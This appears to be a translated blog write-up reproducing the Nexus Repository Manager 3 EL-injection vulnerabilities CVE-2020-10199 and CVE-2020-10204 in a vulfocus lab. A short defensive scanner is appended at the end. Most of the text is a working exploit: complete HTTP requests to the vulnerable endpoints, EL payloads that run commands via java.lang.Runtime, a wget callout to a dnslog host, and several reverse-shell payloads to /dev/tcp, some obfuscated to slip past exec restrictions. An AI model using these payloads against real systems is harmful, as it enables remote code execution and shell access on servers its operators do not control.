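0x00 Preface
This vulnerability reproduction uses
Target: vulfocus
0x01 Description
Nexus Repository Manager 3 is a software repository manager that can store and distribute software repositories such as Maven and NuGet.
The Nexus Repository Manager maintainers published security advisories for CVE-2020-10199 and CVE-2020-10204. CVE-2020-10199 can be triggered with ordinary user privileges, while CVE-2020-10204 requires administrator privileges. Both vulnerabilities are caused by unsafe evaluation of EL expressions.
Affected versions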
Nexus Repository Manager OSS/Pro 3.x <= 3.21.1
Default port:
8081 Sonatype Nexus Repository management page
Reproduction setup
Start the environment
The mapped port is different each time the environment starts; browse to the port that was actually mapped to reach the web interface.
Preset username/password:
admin/admin
0x02 Reproduction (ordinary account method)
This method works with both ordinary and administrator accounts.
After logging in, replace the Cookie and CSRF token and send the request; the EL expression is then evaluated.
POST /service/rest/beta/repositories/go/group HTTP/1.1
Host: 127.0.0.1:8081
Content-Length: 203
X-Requested-With: XMLHttpRequest
X-Nexus-UI: true
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
NX-ANTI-CSRF-TOKEN: 0.7886248393834028
Content-Type: application/json
Accept: */*
Origin: http://127.0.0.1:8081
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Referer: http://127.0.0.1:8081/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: NX-ANTI-CSRF-TOKEN=0.7886248393834028; NXSESSIONID=cedf848f-d881-4b58-ac24-9e9c3ece40bc
Connection: close

{
"name": "internal",
"online": true,
"storage": {
"blobStoreName": "default",
"strictContentTypeValidation": true
},
"group": {
"memberNames": ["$\\A{233*233*233}"]
}
}
DNSlog test
For the DNSlog attempt, I first tried ping and curl, but neither resulted in a successfully executed EL expression; finally, using the wget command produced a request record.
$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('wget hvqkwp.dnslog.cn')}
Reverse shell
At first, using the following statement directly for the reverse shell produced no response at all.
$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('bash -i >& /dev/tcp/xx.xx.xx.xx/6543 0>&1')}
After some research, I found the cause of the problem:
https://blog.spoock.com/2018/11/25/getshell-bypass-exec/
After many attempts, the final payload:
$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/xx.xx.xx.xx/6543 0>&1')}
$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('/bin/bash -c bash$IFS$9-i>&/dev/tcp/xx.xx.xx.xx/6543<&1')}
2.3 Reproduction (administrator account method)
This method only works with an administrator account.
POST /service/extdirect HTTP/1.1
Host: 118.193.36.37:64521
Content-Length: 290
X-Requested-With: XMLHttpRequest
X-Nexus-UI: true
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
NX-ANTI-CSRF-TOKEN: 0.8501743136715239
Content-Type: application/json
Accept: */*
Origin: http://118.193.36.37:64521
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Referer: http://118.193.36.37:64521/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: NX-ANTI-CSRF-TOKEN=0.8501743136715239; _ga=GA1.1.1177666056.1593768292; _gid=GA1.1.174097340.1593768292; NXSESSIONID=8c94eba8-2764-4b02-801f-e4c58769cb4d
Connection: close

{"action":"coreui_Role","method":"create","data":[{"version":"","source":"default","id":"1111","name":"2222","description":"3333","privileges":["$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('wget im87gx.dnslog.cn')}"],"roles":[]}],"type":"rpc","tid":89}
Remember to replace the Cookie and CSRF-TOKEN.
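A defender-side check for the two requests shown above, as an added example that is not part of the original post: it scans captured request bodies sent to the two endpoints for an EL expression opener in the fields the post shows carrying it (`group.memberNames` and the role's `privileges`). The function names and the sample captures are constructed for illustration; only the endpoints, field names and the arithmetic probe come from the post.

```python
import json
import re

# EL opener as it appears in the requests above: "$" (or "#"), optional
# backslash-letter escapes such as "\A", then "{".
EL_MARKER = re.compile(r"[$#](?:\\+[A-Za-z])*\{")

def _group_members(body):
    group = body.get("group", {}) if isinstance(body, dict) else {}
    return group.get("memberNames", []) if isinstance(group, dict) else []

def _role_fields(body):
    values = []
    for call in body if isinstance(body, list) else [body]:  # Ext.Direct may batch calls
        if isinstance(call, dict) and call.get("action") == "coreui_Role":
            for item in call.get("data") or []:
                if isinstance(item, dict):
                    values += item.get("privileges") or []
                    values += item.get("roles") or []
    return values

# Endpoints and fields taken from the two requests in the post.
WATCHED = {
    "/service/rest/beta/repositories/go/group": _group_members,
    "/service/extdirect": _role_fields,
}

def scan_request(method, path, raw_body):
    """Return the field values of one captured request that contain an EL opener."""
    extract = WATCHED.get(path.split("?", 1)[0])
    if method.upper() != "POST" or extract is None:
        return []
    try:
        body = json.loads(raw_body)
    except ValueError:
        # Malformed JSON sent to a watched endpoint: match on the raw text instead.
        return [raw_body] if EL_MARKER.search(raw_body) else []
    return [v for v in extract(body) if isinstance(v, str) and EL_MARKER.search(v)]

# Constructed sample captures (method, path, body); the first uses the probe from the post.
SAMPLES = [
    ("POST", "/service/rest/beta/repositories/go/group",
     r'{"name":"internal","group":{"memberNames":["$\\A{233*233*233}"]}}'),
    ("POST", "/service/rest/beta/repositories/go/group",
     r'{"name":"internal","group":{"memberNames":["go-proxy","go-hosted"]}}'),
    ("POST", "/service/extdirect",
     r'{"action":"coreui_Role","method":"create","data":[{"id":"1111","privileges":["${1+1}"],"roles":[]}],"type":"rpc","tid":1}'),
]
RESULTS = [scan_request(*sample) for sample in SAMPLES]
```

A legitimate group member name or privilege id has no reason to contain `${` or `$\A{`, so any hit on an instance in the affected range (3.x <= 3.21.1) is worth correlating with the session that sent it.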